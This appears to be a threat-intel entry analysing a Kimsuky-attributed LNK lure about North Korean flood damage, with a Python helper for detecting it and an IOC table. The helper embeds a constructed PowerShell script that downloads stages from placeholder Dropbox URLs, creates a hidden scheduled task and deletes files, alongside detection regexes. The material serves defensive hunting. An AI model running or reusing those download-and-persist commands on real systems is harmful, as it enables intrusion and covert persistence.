Malware created by North Korea's Kimsuky - KxS North Korea flood damage interview request (Chairman Lee ?-yeol of Daemun? Academy).lnk (2025.4.5)

2025-04-17 Malware Created by North Korean Kimsuky - KxS North Korea Flood Damage Interview Request (for Chairman Lee ?-yeol of Daemun? Academy).lnk (2025.4.5)

http://wezard4u.tistory.com/429459


The Korean-language write-up analyzes an LNK lure named as a North Korea flood-damage interview request and assesses it as likely Kimsuky-related, while explicitly noting that the attribution is an estimate. The shortcut masquerades as a PDF and launches PowerShell in a hidden window with the execution policy bypassed and the payload passed as a Base64-encoded command. The decoded logic downloads a decoy DOCX and staged PowerShell scripts from dl.dropboxusercontent.com URLs, writes scripts such as user.ps1, OperaUpdate.ps1, board_first.ps1 and temp0748634889.ps1 under AppData, executes them, and deletes its temporary files. Persistence is a hidden scheduled task named "OperaUpdate 22-15454342-7.28" that reruns OperaUpdate.ps1 every 30 minutes. Together these give defenders concrete file paths, a task name, hashes and a cloud-delivery pattern to hunt for.
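The chain above (PDF-lookalike .lnk, hidden PowerShell with a Base64 -EncodedCommand, Dropbox-hosted stages written to AppData, a schtasks persistence entry) is easy to hunt for on process command lines once the encoded argument is decoded. The following Python triage helper is an added example for this page, not code from the write-up or from the aggregator: it decodes a PowerShell -EncodedCommand argument (Base64 of UTF-16LE text) and checks the command line plus the decoded payload against the indicators the summary lists. The sample command line, the Dropbox paths, the decoy name and the schtasks options are constructed for the example; only the script names and the task name come from the summary, and the parameter prefixes matched (-w/-WindowStyle, -e/-ec/-enc/-EncodedCommand, -ep/-ExecutionPolicy) are the common short forms, not an exhaustive list of what powershell.exe accepts.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed inner script, shaped like the decoded -EncodedCommand logic the
# write-up describes. The Dropbox URLs, the decoy file name and the schtasks
# options are assumptions; the .ps1 names and the task name are from the summary.
INNER_SCRIPT = r'''
$decoy = "$env:TEMP\interview_request.docx"
$stage = "$env:APPDATA\OperaUpdate.ps1"
Invoke-WebRequest -Uri "https://dl.dropboxusercontent.com/scl/fi/EXAMPLE/decoy.docx" -OutFile $decoy
Invoke-WebRequest -Uri "https://dl.dropboxusercontent.com/scl/fi/EXAMPLE/user.ps1" -OutFile $stage
Start-Process $decoy
schtasks /create /tn "OperaUpdate 22-15454342-7.28" /tr "powershell -w hidden -ep bypass -f $stage" /sc minute /mo 30 /f
Remove-Item "$env:APPDATA\temp0748634889.ps1" -Force
'''


def encode_command(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand: Base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def build_sample_cmdline() -> str:
    """Constructed outer command line of the kind a PDF-lookalike .lnk would carry."""
    return ("powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
            "-EncodedCommand " + encode_command(INNER_SCRIPT))


# Common spellings of the encoded-command switch (assumption: not every prefix
# powershell.exe accepts is listed here).
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


# Indicator name -> pattern. Each one maps to a behaviour named in the summary.
INDICATORS = [
    ("hidden_window",           re.compile(r"-w\w*\s+hidden", re.I)),
    ("execution_policy_bypass", re.compile(r"-e\w*\s+bypass", re.I)),
    ("dropbox_delivery",        re.compile(r"dl\.dropboxusercontent\.com/", re.I)),
    ("appdata_ps1",             re.compile(r'(?:\$env:appdata|%appdata%|appdata\\roaming)\\[^\s"\']*\.ps1', re.I)),
    ("known_script_name",       re.compile(r"\b(?:user|OperaUpdate|board_first|temp0748634889)\.ps1\b", re.I)),
    ("scheduled_task_create",   re.compile(r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.I)),
    ("operaupdate_task_name",   re.compile(r'/tn\s+"?OperaUpdate\b', re.I)),
    ("thirty_minute_rerun",     re.compile(r"/sc\s+minute\s+/mo\s+30\b", re.I)),
    ("cleanup",                 re.compile(r"\bRemove-Item\b", re.I)),
]


def scan(text: str) -> List[str]:
    """Names of the indicators present in the text, in definition order."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def triage(cmdline: str, threshold: int = 3) -> Dict[str, object]:
    """Decode any -EncodedCommand payload and score the visible command plus payload."""
    decoded = decode_encoded_command(cmdline)
    visible = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = scan(visible)
    return {"decoded": decoded, "hits": hits, "suspicious": len(hits) >= threshold}


if __name__ == "__main__":
    result = triage(build_sample_cmdline())
    print("decoded payload:\n", result["decoded"])
    print("indicators:", result["hits"], "suspicious:", result["suspicious"])
```

Feed it the CommandLine field from process-creation telemetry (Sysmon event 1, Windows 4688 with command-line auditing). The decode step matters: none of the inner indicators (the Dropbox host, the AppData path, the task name) are visible in the outer command line until the Base64 is turned back into text, so hunts that only grep the raw command line will see just the hidden-window and bypass switches.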

Indicators of Compromise

Type  Value                                First Seen   Last Seen
HASH  89bca3a895fc2c0b5e975372675f0049     2025-04-17   2025-04-17
HASH  6262c5ef438992966eda78d6d58e631…     2025-04-17   2025-04-17
HASH  169aa69557f591296388c6abe81e6ed…     2025-04-17   2025-04-17
URL   https://dl.dropboxusercontent.c…     2025-04-17   2025-04-17
URL   https://dl.dropboxusercontent.c…     2025-04-17   2025-04-17

Values ending in … are truncated as presented by the source. The hash algorithm is not stated; the first value is 32 hex characters (MD5 length).
